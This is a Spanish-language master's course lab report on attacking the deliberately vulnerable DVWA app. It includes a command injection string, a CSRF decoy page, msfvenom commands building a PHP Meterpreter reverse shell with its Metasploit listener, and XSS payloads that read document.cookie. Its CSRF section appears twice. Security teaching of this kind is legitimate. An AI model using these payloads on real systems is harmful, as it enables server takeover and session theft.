Universidad Mariano Gálvez de Guatemala

Facultad de Ingeniería de Sistemas de Información

Maestría en Seguridad de Sistemas de Información
Seguridad de Aplicaciones
Ing. Deonel Roberto Rabanales Carredano

Practica OWASP / DVWA

Heber Otoniel Reyes Luch 1293-04-835

Eder Iván Castañeda Ríos 1293-13-6926
Wilson Rene Rangel Reyes 1293-10-4936
Carlos Rene Velásquez Escobar 1293-11-3108
Carlos Humberto Portillo Méndez1293-11-4145
Plan Diario Vespertino
28 de octubre de 2,019
 Introducción

Cada vez es más importante la seguridad informática ya que en la actualidad

la tecnología es cada vez es más intrínseca en nuestras tareas cotidianas, las
aplicaciones no son la excepción ya que nos permiten realizar operaciones y tareas
de una forma más rápida, no obstante, nuestros datos por su innegable valor e
importancia corren riesgo por lo que establecer lineamientos que apoyen, orienten
y se realicen pruebas de mitigación de estos es crucialmente importante.

En el siguiente escrito se podrá apreciar las principales herramientas y

lineamientos más utilizados por profesionales para la seguridad de las aplicaciones
web, no limitando solo a teoría si no como también dando a conocer cómo funcionan
y demostrando los principales riesgos y explotación de estos. También podremos
apreciar los factores que influyen y las situaciones donde pueden darse los casos
asi como un pequeño taller explicado paso a paso de cómo se pueden llevar a cabo
estos ataques para explotar las vulnerabilidades.
OWASP
El proyecto de seguridad de aplicaciones web abiertas por sus siglas en inglés
(OWASP) open web aplicación security project es una organización
benéfica mundial sin fines de lucro, establecida en pro de mejorar la seguridad de
los programas. El objetivo principal de esta institución es hacer que la seguridad
del software sea compartida y vista, para que todas las personas intestadas y las
organizaciones puedan tomar acciones pertinente y decisiones teniendo
conocimiento de estas. OWASP establece un lugar centralizado para proporcionar
información imparcial y práctica sobre AppSec a personas, organizaciones,
universidades, agencias gubernamentales y otras organizaciones en todo el
mundo.

OWASP proporciona herramientas de software, documentación,

recomendaciones y mejores prácticas basados en bases de conocimiento sobre
seguridad de aplicaciones.

El Owasp es una comunidad donde todos están invitados a participar,

donde se publican de manera publican materiales bajo una licencia de software
gratuita y abierta.

DVWA

La aplicación web vulnerable por sus siglas en ingles DVWA DAMM

VULNERABLE WEB APP, es una aplicación web vulnerable programada
en PHP/MYSQL La cual fue construida vulnerable. En esta aplicación, los
profesionales de la seguridad, los hackers éticos realizan sus pruebas, miden sus
habilidades y ejecutan sus diversas herramientas en un entorno controlado y legal
en donde también ayudan a los desarrolladores web a comprender y aprender de
mejor manera los procesos de seguridad de las aplicaciones web.

Beneficios de DVWA
 - En DVWA no tienes que solicitar licenciadas ni ningún permiso de otros.
Simplemente puedes instalarla en un entorno virtual y comenzar a usarla.

- Fácil de instalar.

- Mejor opción para realizar Pentesting o hacking.

- Las pruebas se realizan en un entorno local controlado, esto es legal

- Hackear cualquier cosa sin permiso es un crimen. Entonces, como estudiante o

principiante aquí tienes ese permiso, puedes usarlo. Para que los usuarios
avanzados mejoren su habilidad, la DVWA es la mejor plataforma.

Tipos de vulnerabilidades en DVWA

- Fuerza bruta

- Inyección de comando

- CSFR

- Carga de archivos

- Inyección de SQL

- SQL Injectcion blind

- ID de sesión débil

- XSS Reflect

- XSS Store
Ataque de fuerza bruta
1. Mediante la herramienta Burp Site iniciamos un proxy y lo colocamos en
nuestro navegador
2. Intentamos loguearnos en la pagina con un usuario que no necesariamente
será correcto puesto que lo desconocemos.
3. Vemos la información que nos devuelve nuestro proxy
4. En la opción intruder configuramos nuestro ataque.
5. Seleccionamos una lista de posibles usuario y contraseñas.
6. Lanzamos nuestro ataque y verificamos cual fue la combinación correcta.
Command Injection
1. En el caso de este ataque no necesariamente se necesita una herramienta
para poder ya sea obtener información o realizar algún tipo de daño
mediante los comandos a ingresar. Inicialmente es un ping lo que presenta
nuestra página.
2. Podría bastar con concatenar a la IP de nuestro servidor web algunos
comandos para obtener distinta información. Como, por ejemplo:
127.0.0.1 & dir..\..\ bastara para saber que archivos contiene el directorio de
la página web.
Ataque CSRF
Es un ataque que se aprovecha de la sesión creada dentro de una aplicación, si el
usuario deja por ejemplo su banca en línea abierta, y navega en otras páginas,
estas páginas pueden ejecutar código malicioso que puede ejecutar operaciones
sin que el usuario sepa, por ejemplo:
1) Ingresar a nuestra página
Usuario: admin
Contraseña: password

2) Ya con la sesión creada, crear una página señuelo para que esta puede
ejecutar el ataque fácilmente, en el cuerpo de la página va la imagen de un
perro y a los 5 segundos redirecciona a la página para cambiar contraseña.

Entre el enlace va la nueva contraseña, en este caso es 123456.

3) La página se verá así, por ejemplo:

4) Y a los 5 segundos mostrará que cambio contraseña:

5) Ahora si intentamos ingresar con contraseña password será imposible ya
que la contraseña fue cambiada desde la página señuelo.
File Inclusión
Es un ataque que es usado para poder ingresar a otros directorios del servidor,
podríamos explorar todos los archivos del servidor de una forma fácil.
1) Ingresamos a la opción de File Inclusion

2) Hacemos clic en la file1.php y se ve el contenido del archivo file1.php de

forma embebida en la página.

3) Podríamos cambiar el nombre del archivo para probar si existe el archivo

file4.php y efectivamente confirmamos que existe.
 4) Si somos más curiosos podríamos buscar archivos dentro del
servidor sin estar en el directorio de apache web.
Ataque CSRF
Es un ataque que se aprovecha de la sesión creada dentro de una aplicación, si el
usuario deja por ejemplo su banca en línea abierta, y navega en otras páginas,
estas páginas pueden ejecutar código malicioso que puede ejecutar operaciones
sin que el usuario sepa, por ejemplo:
1) Ingresar a nuestra página
Usuario: admin
Contraseña: password

2) Ya con la sesión creada, crear una página señuelo para que esta puede
ejecutar el ataque fácilmente, en el cuerpo de la página va la imagen de un
perro y a los 5 segundos redirecciona a la página para cambiar contraseña.

Entre el enlace va la nueva contraseña, en este caso es 123456.

3) La página se verá así, por ejemplo:

4) Y a los 5 segundos mostrará que cambio contraseña:

5) Ahora si intentamos ingresar con contraseña password será imposible ya
que la contraseña fue cambiada desde la página señuelo.
File upload

La vulnerabilidad de carga de archivos es un problema importante con las

aplicaciones basadas en web. En muchos servidores web, esta vulnerabilidad
depende por completo del propósito que permite a un atacante cargar un archivo
que oculta código malicioso en su interior que luego puede ejecutarse en el
servidor. Un atacante podría poner una página de phishing en el sitio web o dañar
el sitio web.
El atacante puede revelar información interna del servidor web a otras personas y
algunas oportunidades para obtener datos confidenciales pueden ser informales,
por personas no autorizadas.
En DVWA, la página web permite al usuario cargar una imagen, y la página web
continúa con la codificación del programa y comprueba si los últimos caracteres del
archivo son '.jpg' o '.jpeg' o '.png' antes de permitir que la imagen se cargue en
directorio.

Requisito:
1. Servidor Xampp
2. DVWA
3. Kali Linux: metaexploit

Ejecución de Vulnerabilidad:

Abrir la terminal en Kali Linux y crear la puerta trasera de PHP mediante el

comando

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.30 lport=4444 -f raw > -

/Desktop/shell.php
cargar archivo en la opción de carga de archivos desde el menú de
vulnerabilidad.
Ahora haga clic en el botón Examinar para examinar el archivo shell.php para
cargarlo en el servidor web.

En terminal de kali Ejecutamos los comandos

mfsconsole
Use multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set LHOST 192.168.1.30
run
copiamos la url del archivo cargado en el navegador de la siguiente manera.

Luego en la terminal de kali ejecutamos:

Sysinfo

Luego en la terminal de kali ejecutamos los comandos:

Shell
Uname –a
Conclusiones:
Y así vulneramos la seguridad de cargar archivos piratas en DVWA cargando un
Shell.php (archivo no admitido).

Ataque XSS reflected

En primer lugar, es importante tener en cuenta que, con esta vulnerabilidad, los
atacantes explotan la confianza que un usuario tiene en un sitio en particular, y esto
nos da una dimensión del impacto que puede tener.
Este tipo de vulnerabilidad puede ser explotada de dos maneras: de forma reflejada
y de forma almacenada. A continuación, haré una breve explicación de cada una.

Como funciona ¿?
Consiste en modificar valores que la aplicación web usa para pasar variables entre
dos páginas. Un clásico ejemplo de esto es hacer que a través de un buscador se
ejecute un mensaje de alerta en JavaScript. Con XSS reflejado, el atacante podría
robar las cookies para luego robar la identidad, pero para esto, debe lograr que su
víctima ejecute un determinado comando dentro de su dirección web.
Para esto, los cibercriminales suelen enviar correos engañosos para que sus
víctimas hagan clic en un enlace disfrazado y así se produzca el robo.
Requisito:
1. Servidor Xampp
2. DVWA (localhost)
Ejecución de Vulnerabilidad:
Analizamos el código de la página DVWA haciendo click en “view source”

Utilizando código javascript, podemos dirigir una página confiable a otro sitio
alterno.
<script>alert("felicidades has ganado click aqui")</script>
Como se muestra en la siguiente captura podemos agregar un link o un mensaje,
para solicitar información del usuario.

Conclusiones:
En primer lugar, es fundamental, como siempre mencionamos, que cuentes con una
solución de seguridad instalada y actualizada. Esto es importante ya que, ante la
ejecución de alguna aplicación maliciosa sin tu consentimiento, tal como malware o
exploits, automáticamente será bloqueada.
Además, si se trata de una redirección a algún sitio de phishing, se cuenta con la
protección del antivirus y el bloqueo proactivo por parte de los navegadores.

En segundo lugar, es muy importante que estés siempre atento a dónde ingresas:
siempre es bueno mirar la dirección URL a la que se está accediendo. Ya hemos
visto ejemplos de esto, como por ejemplo las redirecciones de Facebook, que
pueden ser aprovechadas por atacantes, si no se tienen en cuenta algunos
consejos, como ya hemos visto anteriormente, aquí dejamos 7 consejos para todos
aquellos que les guste explorar Internet.

Por otro lado, existen complementos para los navegadores que se encarga de
bloquear estos scripts en sitios web. Uno de ellos es NoScript, que permite realizar
configuraciones personalizadas (y es gratuito).

Finalmente, nunca es una mala opción utilizar navegadores alternativos, quizás no

tan populares, como Opera, Comodo o Chromium, entre otros. De esta forma, si un
atacante lanza un ataque que intenta explotar alguna vulnerabilidad en uno de los
navegadores más conocidos a través de un exploit, al no cumplirse las condiciones
para la explotación exitosa de la vulnerabilidad, esto denegará el acceso al sistema.

A veces algunas de estas vulnerabilidades exceden a los usuarios, ya que puede

tratarse de un problema que no se resuelve instalando actualizaciones en el equipo.
Por otra parte, para resolver este tipo de cuestiones, es necesario que el
administrador del sitio agregue los controles necesarios, para que nada pueda ser
modificado por un tercero.

Ataque XSS stored

Un ataque stored XSS o persistente, es un ataque que consiste en la inyección de

código sobre un determinado sitio web en el cual pasa a formar parte del propio
código del aplicativo este es un ataque muy peligroso ya que afecta a todos los
usuarios que ingresen al sitio infectado.

Ejemplos de XSS STORED:

Infección de código leve:

Insertando el código en un campo

<h1> maestria Umg </h1>
Logramos insertar un label a el sitio infectado
Infección de clase media de código malicioso
Ingresando el código en un campo que no tiene validado
<script>alert(“mensaje”)<s/cript>
Infección alta de secuestro de cookies
Ingresar el código en un campo sin validaciones
<script>alert(document.cookie)</script>
 Conclusiones

- Hoy en día la seguridad de las aplicaciones debería ser una parte vital de
perfeccionar, ya que el índice de delitos cibernéticos está en aumento y los
riesgos de sufrir un ataque de estos causaría un daño potencial a la
organización, es de suma importancia mantenerse a la vanguardia de lo
último en seguridad en sus aplicaciones para mantener sus datos y
operación.

- Es importante mantenerse al tanto de páginas y comunidades de seguridad

para estar perfeccionando y reparando las ultimas vulnerabilidades de
seguridad en sus aplicaciones.

- Para los profesionales y estudiantes de hacking ético es importante realizar

sus pruebas en un entorno controlado y aislado para evitar incurrir en
delitos.

- Es importante que el desarrollador verifique y realicen las pruebas

pertinentes para evitar riesgos que puedan comprometer los datos y
operación de las organizaciones.

- Muchas de los riesgos son intrínsecas de las plataformas donde se

desarrolla el software por lo que se deben mantener actualizadas con los
últimos parches de seguridad.
 Referencias Bibliograficas

http://www.dvwa.co.uk/

https://www.blog.binaria.uno/2019/04/02/que-es-dvwa-y-por-que-los-hackers-eticos-la-
aman/

https://www.sonarqube.org/features/security/?gclid=Cj0KCQjw6eTtBRDdARIsANZWjYa
RI6YYDKYbgudp-4w-pdd6p4cpupo7rSWjii_Ice5gJgyMIi0XG7QaAriREALw_wcB

https://www.federico-toledo.com/introduccion-al-testing-de-seguridad/

https://aprendizdesysadmin.com/como-instalar-dvwa-damn-vulnerable-web-app-en-kali-
linux/